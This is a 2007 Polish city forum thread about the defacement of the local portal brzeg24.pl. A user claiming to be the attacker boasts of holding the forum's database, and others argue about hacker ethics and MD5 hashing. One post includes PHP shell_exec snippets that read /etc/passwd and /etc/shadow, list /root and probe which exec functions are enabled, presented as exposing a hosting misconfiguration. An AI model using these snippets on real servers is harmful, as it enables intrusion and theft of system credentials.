Forum Brzeg
Forum miasta Brzeg. (ISSN 1869-609X)

Ciekawe Linki - zhakowane http://brzeg24.pl/

Devon - 2007-07-27, 16:40
Temat postu: zhakowane http://brzeg24.pl/
strona została zhakowana :(

http://brzeg24.pl/ jak i http://brzeg24.eu

potwierdzenie http://www.flickr.com/pho...@N00/915096515/

ispince - 2007-07-27, 18:27

jak by administrator szukał winowajcy :D :D

znajdzie go tutaj

:cry: mój ulubiony portal zhakowany :D :D

czyżby za te wszystkie kopie :wink:

blaster - 2007-07-27, 18:57

Ranga hhaker: Amator :D :D umarłem
ispince - 2007-07-27, 21:13

blaster napisał/a:
Ranga hhaker: Amator :D :D umarłem


jak to było "znajomy informatyk z Wrocławia" :D :D

już z kilka godzin stronka zhakowana :D :D dobra robota :wink: "amatorska"

qBK - 2007-07-27, 22:04

No niestety, pisanie bezpiecznych aplikacji w php-mysql to nie jest rzecz prosta... Każdy kto się tym zajmował to potwierdzi, trochę czasu upływa nim człowiek się uwrażliwi na pewne rzeczy, ciężko jest przewidzieć wszystkie możliwości :) A czasem wina nie leży po stronie użytkownika tylko hosta, u którego są wadliwe zabezpieczenia.
kylo - 2007-07-28, 19:02

Ciekawe co red_ag zrobi z tym fantem.. :) Szkoda trochę tego nowego portalu..
eMGie - 2007-07-28, 19:57

Kurde, ale co jakiś red_ag miałby mieć do naszego portalu? Skąd go w ogóle zna? Zrozumiałbym, gdyby shackował jakiś portal o "zasięgu" krajowym, a nie taki miastowy... No chyba, że to brzeżanin....
yashin - 2007-07-28, 21:01

eMGie napisał/a:
Kurde, ale co jakiś red_ag miałby mieć do naszego portalu? Skąd go w ogóle zna? Zrozumiałbym, gdyby shackował jakiś portal o "zasięgu" krajowym, a nie taki miastowy... No chyba, że to brzeżanin....

To nie oto chodzi, mogł natrafić np na tą strone przez wyszukiwarke, każdy początkujący haker próbuje wszystkiego, na każdej stronie można znaleść luke. większość portali jest dziurawych jak ser.

witu - 2007-07-29, 09:31

http://brzeg24.pl/index_stary.php tu jest stronka z przed shackowania :) red_ag nic nie skasował:)
red_ag - 2007-07-29, 09:35

Dj YAsHiN napisał/a:
eMGie napisał/a:
Kurde, ale co jakiś red_ag miałby mieć do naszego portalu? Skąd go w ogóle zna? Zrozumiałbym, gdyby shackował jakiś portal o "zasięgu" krajowym, a nie taki miastowy... No chyba, że to brzeżanin....

To nie oto chodzi, mogł natrafić np na tą strone przez wyszukiwarke, każdy początkujący haker próbuje wszystkiego, na każdej stronie można znaleść luke. większość portali jest dziurawych jak ser.


Spodobała mi się szata graficzną, chciałem podejrzeć jak to wygląda od środka, a że strona dziurawa, to przy okazji... ;)

Początkujący haker ma całą bazę tego forum, nie liczcie na to, że aktualizacja badziewnego forum Przema, Was chroni. Pozdrawiam.

blaster - 2007-07-29, 10:25

lol ciekawy jaki forumowicz się teraz bawi i sobie taki nick założył jesli to jestes ty to dodaj coś jeszcze na zhakowanej stronie dla potwierdzenia
yasiu - 2007-07-29, 10:46

red_ag, jeżeli jesteś hakerem to naprawdę bardzo początkującym, pisząc na forum nie ukryłeś adresu IP, co jeżeli okazało by się prawdą udostępnię kolegom w niebieskich mundurach. To że piszesz z Neostrady nie daje ci anonimowości 2 dni i policja może być u ciebie w domu. Teraz się uśmiałem ;)
blaster - 2007-07-29, 11:11

dlatego mówie haker nad hakerami :D ranga początkujący jest jednak prawdziwa. Ja tam bym zgłosił do admina brzeg24.pl czy chce mu wytoczyc proces i podalbym numer IP niech lamer ma za swoje
red_ag - 2007-07-29, 13:41

Nie ukryłem swojego IP? Na pewno? Możesz je tu podać? To każdy sobie whoisa walnie i zobaczymy ;)
Początkujący haker to lepsze niż mało_kumaty_admin, który naraża użytkowników na wyciek swoich haseł. Pozdrawiam.

Pan_Pasztet - 2007-07-29, 13:43

widzę że tu idą coraz mocniejsze słowa.... Jakby nie bylo brakuje stronki ;/
yasiu - 2007-07-29, 14:02

Hasła są zapisane w MD5 więc wyciek nic nie da, gdyż rozkodowanie md5 trochę trwa ( nie mówię że nie jest możliwe ).

Swoją drogą zawsze zastanawiało mnie po co hakerzy niszczą czyjąś pracę.

red_ag - 2007-07-29, 14:13

Nic nie zniszczone - http://brzeg24.pl/index_stary.php

Czyste MD5 to teraz nie problem.

Pan_Pasztet - 2007-07-29, 14:17

red_ag, wez zhakuj fotkę ;) albo wp ;) wtedy bede mial do ciebie respekt ;)
qBK - 2007-07-29, 14:18

yasiu napisał/a:
Hasła są zapisane w MD5 więc wyciek nic nie da, gdyż rozkodowanie md5 trochę trwa ( nie mówię że nie jest możliwe).


Standardowe MD5 ma już 16 lat, to dość długo jak na tego typu algorytm. Niestety są już nawet serwisy online które odwracają MD5 (oczywiście nie każde, ale zbiory są potężne), więc sugerowałbym zmianę haseł :) Generalnie to ja staram się od czasu do czasu zmieniać hasła wszędzie gdzie się da i do forów używać innych niż do ważniejszych kont, takich jak poczta, nie mówiąc już oczywiście o banku, gdzie hasło powinno być bardzo długie i absolutnie unikalne...

[edit] no właśnie, spóźniłem się :)

red_ag - 2007-07-29, 14:59

pasztet007 napisał/a:
red_ag, wez zhakuj fotkę ;) albo wp ;) wtedy bede mial do ciebie respekt ;)


Nie oczekuję, żebyś mnie szanował, bo sam Cię nie szanuję i mam to za przeproszeniem gdzieś co o mnie myślisz.

blaster - 2007-07-29, 15:03

hahahaha fotka to dla neigo zbyt duża robota więc nawet sie lamer za nią nie bierze żeby porażki nie zaliczyć
bekamsobie - 2007-07-29, 15:04

Napisz chociaż co miał na celu twój atak.
Pokazanie twórcom dziur w ich serwisie?
Zemstę?
Czy po prostu chciałeś się sprawdzić?

Pan_Pasztet - 2007-07-29, 15:15

red_ag napisał/a:
pasztet007 napisał/a:
red_ag, wez zhakuj fotkę ;) albo wp ;) wtedy bede mial do ciebie respekt ;)


Nie oczekuję, żebyś mnie szanował, bo sam Cię nie szanuję i mam to za przeproszeniem gdzieś co o mnie myślisz.


ja i tak nie mam do ciebie szacunku;) zgadzam się z przedmówca
bekamsobie napisał/a:
Napisz chociaż co miał na celu twój atak.
Pokazanie twórcom dziur w ich serwisie?
Zemstę?
Czy po prostu chciałeś się sprawdzi



czy poprostu nie mogles juz przejsc sapera i dlatego za coś innego się zabrales??:)

red_ag - 2007-07-29, 15:20

blaster: gardzę takimi ludźmi jak Ty.

pasztet007 napisał/a:
Napisz chociaż co miał na celu twój atak.
Pokazanie twórcom dziur w ich serwisie?
Zemstę?
Czy po prostu chciałeś się sprawdzi


Odp. A

yashin - 2007-07-29, 18:28

yasiu napisał/a:
Hasła są zapisane w MD5 więc wyciek nic nie da

Mylisz się Yasiu, rozkodowania MD5 to jest max kilkanaście minut roboty przy dobrym szczęściu, są już do tego specjalne programy które to rozkodowują. Mi się wydaje, że red_ag użył jakiegoś exploita. Forum też nie jest zabardzo zabezpieczone.

mamrow - 2007-07-30, 14:21

Po części jest to wina systemu jaki jest używany na brzeg24.pl ( w tym wypadku to chyba była Joomla ale nie pamiętam ponieważ nie było stopki ) a po części wina konfiguracji serwera NetArt. Podstawowym błędem jest włączenie funkcji shell_exec i exec na serwerach NetArt, które potem wykorzystują tacy ludzie jak red_ag. Oczywiście jest możliwość ich wyłączenie jednak to zależy od szczęścia na jakiego konsultanta trafimy ;] otóż niektórzy z nich twierdzą, że wyżej wymienione funkcje są właczone w celu globalnego bezpieczeństwa całej struktury Safe mode co w mojej opinii jest kompletnym nonsensem ;] ale to moje zdanie, niektórzy uważają inaczej czego im gratuluje.

A tak między nami red_ag wszystko fajnie, elegancki deface (szkoda że bez obrazka) jednak zastanawia mnie jedna rzecz, dlaczego po takich atakach nie wysyłacie właścicielowi serwisu BugLog'a systemu jaki jest używany przez daną osobę, bądź aplikacji która jest przyczyną włamania, po co masz pozwalać swojej konkurencji włamywać się jeszcze raz na ten sam serwis. Pomyśl, będzie to czyniło Cię wyjątkowym zważywszy na to, że będziesz jedyną osoba jaka włamała się na Regionalny Portal Brzeg24.pl/eu ;]

Kilka bardzo prostych przykładów jak można wykorzystać shell_exec:

1.Zapisujemy plik z poniższym kodem w wybranym katalogu, a ten wyświetla nam liste plików oraz folderów ( przy użyciu rozwiniętej aplikacji "włamywacz" ma możliwość dostępu do każdego katalogu i pliku na serwerze )
Kod:
<?php
$output = shell_exec('ls -lart');
echo "<pre>$output</pre>";
?>


2. Bardzo ciekawa rzecz jednak nie zawsze działa, lepiej nie bede opisywał:
Kod:
<?
$output = shell_exec("cat /etc/passwd|wc -l");
echo(nl2br($output));
$output = shell_exec("cat /etc/shadow");
echo(nl2br($output));
$output = shell_exec("uname -a");
echo(nl2br($output));
$output = shell_exec("ls /root");
echo(nl2br($output));
?>


Poprzez bardzo prosty kod możemy sprawdzić czy na naszym serwerze jest włączona funkcja shell_exec bądź exec, a także wiele innych typu proc_open, popen ( :D )

Oto on:
Kod:
<?php
if(shell_exec('echo lol'))
{
echo('Funckcja shell_exec dziala ');
}
else
{
echo("shell exec nie dziala");
}
if(exec('echo lol'))
{
echo('exec dziala');
}
else
{
echo('exec nie dziala');
}
if(popen('echo lol'))
{
echo('popen dziala');
}
else
{
echo('popen nie dziala');
}
if(proc_open('echo lol','r'))
{
echo("proc open dziala");
}
else
{
echo("proc open nie dziela");
}
if(passthru('echo lol'))
{
echo("passthru dziala");
}
else
{
echo ("passthru nie dziala");
}
?>
<br>
<?php
$d = dir("/tmp/");
while(false !== ($e = $d->read()))
   echo $e . '<br/>';
?>
<br>
<?
$pid = posix_getpid();
echo "Current process ID: $pid\n";
?>


Kompletnie nie rozumiem tego co piszą administratorzy NetArt ( być może się mylę ), przecież we wszystkich dostępnych podręcznikach shell_exec oznaczona jest jako "Ta funkcja jest niedostępna w trybie bezpiecznym"

Tryb Bezpieczny = Safe Mode ? W takim razie gdzie safe_mode na serwerach NetArt?

Pozdrawiam

red_ag - 2007-08-05, 15:21

mamrow: Nast. razem mogę dać obrazek ;) Pobieralnia.org jest Twoja? Tam też miałem hacka, to co pamiętam ;]
SPAT - 2007-08-05, 18:27

zhakuj może stronę prezydent.pl albo coś innego a nie biednych ludzi którzy cieżko nad tym pracują...
Vento - 2007-08-05, 20:10

Zacznijmy od tego że ja nie mam szacunku do HAKERÓW!
Potrafią tylko niszczyć! Kumpel dużo potrafi napsocić... ale jednego nie rozumiem...
Bo on chyba myśli że jak coś haknie to będzie lepszy pużniej się tym szczyci :/ Akurat ma czym! Takich ludzi powinno się ścigać :evil:

yashin - 2007-08-06, 08:55

Vento napisał/a:
Zacznijmy od tego że ja nie mam szacunku do HAKERÓW!
Potrafią tylko niszczyć! Kumpel dużo potrafi napsocić... ale jednego nie rozumiem...
Bo on chyba myśli że jak coś haknie to będzie lepszy pużniej się tym szczyci :/ Akurat ma czym! Takich ludzi powinno się ścigać :evil:

Mylisz sie, nie potrafią tylko niszczyć. Haker włamuje się dla poszerzania własnej wiedzy. A podniecanie się typu udało mi się bo przeczytałem na stronie, że tak się da, używanie gotowych exploitów itp. Takich ludzi można nazwać pseudo hakerami. Vento przeczytaj trochę na temat buqtraq i sam się zdziwisz co zwykły internauta potrafi, jeżeli potrafi myśleć. Podam przykład jeśli znasz php to możesz działać cuda po stronie serwera. Wtajemniczeni wiedzą o co chodzi. A co do phpBB by Przemo wykryto już w nim kolejną dziurę. więc polecam poczytanie trochę na kilka tematów.

Vento - 2007-08-06, 16:41

Spoko koleś :D Znam się troszke na tym ale nigdy nie uczyłem się tego... żeby nie kusiło czasem :P
MruQ - 2007-08-07, 01:13

a nie widac hosta:P? heh szkoda;) ahh CI hakerzy:P
mamrow - 2007-08-07, 09:59

red_ag napisał/a:
mamrow: Nast. razem mogę dać obrazek ;) Pobieralnia.org jest Twoja? Tam też miałem hacka, to co pamiętam ;]


Tak, jestem administratorem i wlascicielem vortalu Pobieralnia.org, co do hacka? Odpowiadam tak, bylo dokladanie 3 wlamania jednak nie pamietam kto byl ich autorem, skupialem sie na przywroceniu strony do zycia ;] natomiast wiem ( przynajmniej tak mi sie wydaje :) ) dlaczego do owych wlaman dochodzilo.


BTW.
Przepraszam o jakiej szkodzie wszyscy tutaj pisza, o jakim niszczeniu czyjejs pracy? Nie powiem aby mi sie podobalo robienie defacu strony ale niestety tak to juz jest, kazdy ma swoj kont w internecie i zajmuje sie roznymi rzeczami. Czytajac wypowiedz 15-latka, ktory nie uczy sie czegos zeby nie kusilo rozbawia, poniewaz kto powiedzial ze owa zakazana wiedza sluzy do kuszenia i do psocenia?

alfix - 2007-08-28, 22:08
Temat postu: Brzeg24.pl
Tak. Teraz mam nadzieję, że nikt się nie włamie :) jest nowa odsłona portalu z lepszymi zabezpieczeniami.. :P

Powered by phpBB modified by Przemo © 2003 phpBB Group